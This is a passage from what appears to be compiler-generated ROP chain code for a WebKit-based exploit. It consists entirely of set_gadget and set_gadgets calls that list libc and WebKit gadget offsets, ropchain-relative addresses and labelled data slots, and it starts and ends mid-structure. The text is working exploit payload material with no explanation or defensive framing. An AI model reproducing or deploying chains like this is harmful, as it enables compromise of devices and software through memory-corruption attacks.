set_gadget(libc_base+759608,); //pop rax //L4249: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+236952, //L4250 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4250: db([0, 0]); // 0x0 //L4167: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+237080, //L4253 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+237096, //L4254 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+237064, //L4252 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4252: db([0, 
0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4253: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4254: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+237208, //L4256 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+237256, //L4259 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+237224, //L4257 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4256: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4257: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4258: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4259: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+237368, //L4260+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+237360, //L4260 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4260: db([0, 0]); // 0x0 set_gadgets([ ropchain+237384, //L4260+24 ropchain+240664, //L4255 libc_base+764760, //pop rsi ropchain+237424, //L4261 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4261: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4263: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+237544, //L4266 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+237528, //L4264 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4264: db([0, 0]); 
// 0x0 set_gadget(libc_base+144605,); //pop rdi //L4266: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+237688, //L4269 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+237656, //L4267 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+237672, //L4268 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4267: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4268: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4269: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+237776, //L4271 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4270: db([4294967295, 4294967295]); // -0x1 set_gadget(libc_base+759608,); //pop rax //L4271: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+237832, //L4272 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4272: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4274: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+237912, //L4276 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4276: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+237992, //L4277 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov 
rax, r8 libc_base+763368 //pop rcx ]); //L4277: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4279: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+238112, //L4282 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+238096, //L4280 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4280: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4282: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+238272, //L4287 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+238288, //L4288 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+238224, //L4284 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4284: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4285: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4286: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4287: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4288: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+238400, //L4289+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+238392, //L4289 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4289: db([0, 0]); // 0x0 set_gadgets([ ropchain+238416, //L4289+24 ropchain+239672, //L4283 libc_base+764760, //pop rsi ropchain+238456, //L4290 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 
libc_base+763368 //pop rcx ]); //L4290: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4292: db([72, 0]); // 0x48 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+238576, //L4295 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+238560, //L4293 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4293: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4295: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+238752, //L4298 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+238768, //L4299 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+238720, //L4296 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+238736, //L4297 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4296: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4297: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4298: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4299: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+238928, //L4303 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+238896, //L4301 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+238912, //L4302 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4300: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4301: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); 
//pop rdi //L4302: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4303: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+239032, //L4305 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+239016, //L4304 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4304: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4305: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+239128, //L4307 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4306: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4307: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4308: db([16, 0]); // 0x10 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+239232, //L4309 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+239248, //L4310 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4309: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4310: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+239416, //L4312 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+239432, //L4313 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+239400, //L4311 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4311: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4312: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4313: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+239576, //L4316 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+239592, //L4317 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+239544, //L4314 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4314: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4315: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4316: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4317: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+239664, //L4318 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4318: db([0, 0]); // 0x0 //L4283: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+239792, //L4321 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+239808, //L4322 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+239776, //L4320 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4320: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4321: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4322: db([0, 0]); // 0x0 set_gadgets([ 
webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+239920, //L4324 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+239968, //L4327 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+239936, //L4325 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4324: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4325: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4326: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4327: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+240080, //L4328+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+240072, //L4328 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4328: db([0, 0]); // 0x0 set_gadgets([ ropchain+240096, //L4328+24 ropchain+240664, //L4323 libc_base+764760, //pop rsi ropchain+240136, //L4329 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4329: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4331: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+240256, //L4334 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+240240, //L4332 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4332: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4334: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi 
ropchain+240400, //L4337 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+240368, //L4335 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+240384, //L4336 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4335: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4336: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4337: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+240488, //L4339 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4338: db([4294967295, 4294967295]); // -0x1 set_gadget(libc_base+759608,); //pop rax //L4339: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+240544, //L4340 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4340: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4342: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+240624, //L4344 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4344: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi //L4323: //L4255: libc_base+764760, //pop rsi ropchain+240704, //L4345 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4345: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4347: db([72, 0]); // 0x48 
set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+240824, //L4350 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+240808, //L4348 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4348: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4350: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+241000, //L4353 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+241016, //L4354 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+240968, //L4351 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+240984, //L4352 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4351: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4352: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4353: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4354: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+241176, //L4358 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+241144, //L4356 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+241160, //L4357 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4355: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4356: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4357: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4358: db([0, 0]); // 0x0 set_gadgets([ 
libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+241280, //L4360 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+241264, //L4359 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4359: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4360: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+241376, //L4362 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4361: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4362: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4363: db([16, 0]); // 0x10 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+241480, //L4364 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+241496, //L4365 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4364: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4365: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+241664, //L4367 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+241680, //L4368 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+241648, //L4366 webkit_base+660161, //mov [rsi], rax 
; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4366: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4367: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4368: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+241840, //L4373 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+241856, //L4374 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+241792, //L4370 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4370: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4371: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4372: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4373: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4374: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+241968, //L4375+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+241960, //L4375 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4375: db([0, 0]); // 0x0 set_gadgets([ ropchain+241984, //L4375+24 ropchain+243336, //L4369 libc_base+764760, //pop rsi ropchain+242024, //L4376 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4376: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4378: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+242144, //L4381 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+242128, //L4379 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4379: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4381: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+242320, //L4384 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+242336, //L4385 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+242288, //L4382 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+242304, //L4383 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4382: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4383: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4384: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4385: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+242432, //L4387 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+242416, //L4386 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4386: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4387: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4388: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4389: db([5, 0]); // 0x5 set_gadget(libc_base+763368,); //pop rcx //L4390: db([5, 0]); // 0x5 set_gadgets([ libc_base+225585, //mov 
rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+242632, //L4392 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4392: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+242688, //L4393 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4393: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+242824, //L4397 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+242808, //L4396 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4395: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4396: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4397: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+242944, //L4400 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+242912, //L4398 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4398: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4399: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4400: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+243080, //L4402 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop 
